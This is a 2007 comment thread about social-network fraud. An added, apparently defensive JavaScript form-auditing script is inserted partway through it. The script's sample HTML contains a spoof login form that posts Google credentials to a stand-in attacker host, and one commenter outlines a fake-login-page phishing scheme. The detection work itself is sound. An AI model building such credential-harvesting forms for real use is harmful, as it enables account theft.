The Register® — Biting the hand that feeds IT

Comments on: Grifters find rich pickings on social networking sites

One very bad practice 

Posted Thursday 17th May 2007 21:49 GMT

I'm not surprised at all about this and would like to expand a little on the bit about fraudsters setting up bogus social networking sites.

The bad practice I refer to is a marketing exercise used by a number of social networks. I'll mention a couple that I hate particularly: hi5.com and tickle.com

I was prompted to register to such sites when I received identically worded personal emails from my Yahoo! contacts. So I investigated...

Towards the end of the registration process (or in the case of Tickle.com, once you have finished a test) you are invited to submit your Yahoo!, MSN and AOL details to 'invite your friends' to the site. When you do this a script logs into your mail account, farms your contact list and sends out automated emails on your behalf.

This is dangerous because they promote the practice of giving out login information to a third party. It's fair to say that big name social networks are trustworthy, but it doesn't take much to set up a bogus version that offers the same functionality.

Tickle.com's TOS say that "If Tickle has reasonable grounds to suspect that you have shared your account access and password with another individual, Tickle has the right to terminate your account and refuse any refund."

One solution, if this is a problem, would be for the likes of Yahoo! to prevent scripts logging into their accounts.

I hope something is done.

What would be the point if it weren't easier. 

Posted Thursday 17th May 2007 22:26 GMT

Computers/technology make things easier for almost everyone; they wouldn't be much good otherwise, would they?

If you're dumb enough to get roped in (creating a false trust is one thing, sending money another), let's not give up yet more personal responsibility just because some sucker was born a minute ago. Scraped knees build character.

Elimination of the unfit and stupid 

Posted Friday 18th May 2007 01:54 GMT

Anyone who uses the same password for a social site and anything with money involved is, quite simply, too stupid to be allowed on the net on their own anyway.

No sympathy whatsoever.

Keyloggers, trojans, etc. are a more serious worry, so I don't access my bank, etc., except from a machine whose security I personally control.

Blogger comments 

Posted Friday 18th May 2007 02:40 GMT

Blogger is a big security hole.

When you comment, it invites you to log in with your Google credentials. It would be the work of moments to make the comment link on a blog template go to a spoof page that collects these instead.

As a minimum, you could then read through email, issue password resets, etc.
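The two patterns described in this thread, a third-party site asking for your Yahoo!/MSN/AOL password under the "invite your friends" banner and a comment link that leads to a spoofed Google login page, share one tell: a form collects a password and sends it somewhere other than the origin that should own it. The script below is an added example written for this page, not code from any commenter or from Blogger, hi5 or Tickle. It audits a page's forms for exactly that tell. The HTML, the page URL, every host name (hi5.example, login.attacker.example and so on) and the list of "trusted" login origins are constructed assumptions; it runs on plain Node.js with no dependencies.

```javascript
// Added example (not from the page or any of its commenters): audit the forms
// on a page for a third-party site asking for your webmail password ("invite
// your friends") and for a login form that posts credentials to a spoofed
// origin. Plain Node.js, no dependencies; every host name here is constructed.

const PAGE_URL = 'https://www.hi5.example/register/step3'; // assumed page URL

// Origins to which a password for these providers may legitimately be sent
// (assumed for the demo; a real deployment would use the providers' own hosts).
const TRUSTED_ORIGINS = [
  'https://login.yahoo.example',
  'https://www.google.example',
];

// Constructed sample markup: an "invite your friends" form that collects a
// Yahoo! password on the social site itself, a harmless comment form, and a
// login form that posts Google credentials to a spoof host over plain http.
const SAMPLE_HTML = `
<html><body>
<h2>Invite your friends</h2>
<form id="invite" action="/invite/import" method="post">
  <label>Yahoo! ID <input name="yid"></label>
  <label>Yahoo! password <input type="password" name="ypass"></label>
  <input type="submit" value="Invite">
</form>
<form id="comment" action="https://www.hi5.example/comment" method="post">
  <textarea name="body"></textarea>
</form>
<form id="login" action="http://login.attacker.example/gaia" method="post">
  <label>Google account <input name="Email"></label>
  <label>Password <input type="password" name="Passwd"></label>
</form>
</body></html>`;

// Identity providers a form may be asking for, detected from its visible text.
const PROVIDER_PATTERNS = {
  yahoo: /yahoo/i,
  msn: /\bmsn\b|hotmail/i,
  aol: /\baol\b/i,
  google: /google|gmail/i,
};

// Pull each <form> out of the markup. A regex is adequate for this demo;
// in a browser you would walk document.forms instead.
function extractForms(html, pageUrl) {
  const forms = [];
  const formRe = /<form\b([^>]*)>([\s\S]*?)<\/form>/gi;
  let m;
  while ((m = formRe.exec(html)) !== null) {
    const [, attrs, body] = m;
    const id = (/\bid\s*=\s*"([^"]*)"/i.exec(attrs) || [])[1] || null;
    const action = (/\baction\s*=\s*"([^"]*)"/i.exec(attrs) || [])[1] || '';
    forms.push({
      id,
      // Relative (or empty) actions resolve against the page itself.
      action: new URL(action, pageUrl).href,
      hasPassword: /<input\b[^>]*\btype\s*=\s*"password"/i.test(body),
      text: body.replace(/<[^>]+>/g, ' '),
    });
  }
  return forms;
}

// One finding per password-collecting form that posts to an origin outside
// trustedOrigins (naming the provider whose credentials it harvests, if any)
// or that sends the password over an unencrypted scheme.
function auditCredentialForms(html, pageUrl, trustedOrigins) {
  const findings = [];
  for (const f of extractForms(html, pageUrl)) {
    if (!f.hasPassword) continue;
    const target = new URL(f.action);
    const providers = Object.keys(PROVIDER_PATTERNS)
      .filter((p) => PROVIDER_PATTERNS[p].test(f.text));
    const reasons = [];
    if (!trustedOrigins.includes(target.origin)) {
      reasons.push(providers.length > 0
        ? `collects ${providers.join('/')} credentials for a third party (${target.origin})`
        : `password posted to untrusted origin ${target.origin}`);
    }
    if (target.protocol !== 'https:') {
      reasons.push(`password sent over ${target.protocol.replace(':', '')}`);
    }
    if (reasons.length > 0) {
      findings.push({ id: f.id, target: target.origin, providers, reasons });
    }
  }
  return findings;
}

const REPORT = auditCredentialForms(SAMPLE_HTML, PAGE_URL, TRUSTED_ORIGINS);
for (const f of REPORT) console.log(`form#${f.id}: ${f.reasons.join('; ')}`);
```

Against the sample, the comment form is ignored (no password field), the invite form is flagged because it collects Yahoo! credentials on the social site's own origin rather than Yahoo!'s, and the login form is flagged twice: it posts Google credentials to a host that is not Google, and it does so over plain http. The origin comparison is the important part; a spoof page can copy the provider's markup exactly, but it cannot make the form post to the provider's origin without handing the credentials back.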

Been Grifted? Let Me Know... 

Posted Friday 18th May 2007 15:23 GMT

Answers gratefully accepted - at LinkedIn.com

http://www.linkedin.com/answers/technology/information-technology/information-security/TCH_ITS_ISC/46748-7404330

Thank You Captain Obvious 

Posted Saturday 19th May 2007 09:56 GMT

If you lie to people on any forum you can build trust and then abuse that trust. Do these guys really need press that badly that they would waste their time proving the obvious?

LinkedIn / Facebook: Why not just email the CIA a daily update on your life? 

Posted Monday 21st May 2007 16:05 GMT

Great sites, if you like exposing your social / business schedule, contacts list and more to all and sundry state and private US authorities wishing to spy on you or use the exposed data to gain commercial advantage or insight into your life / business.
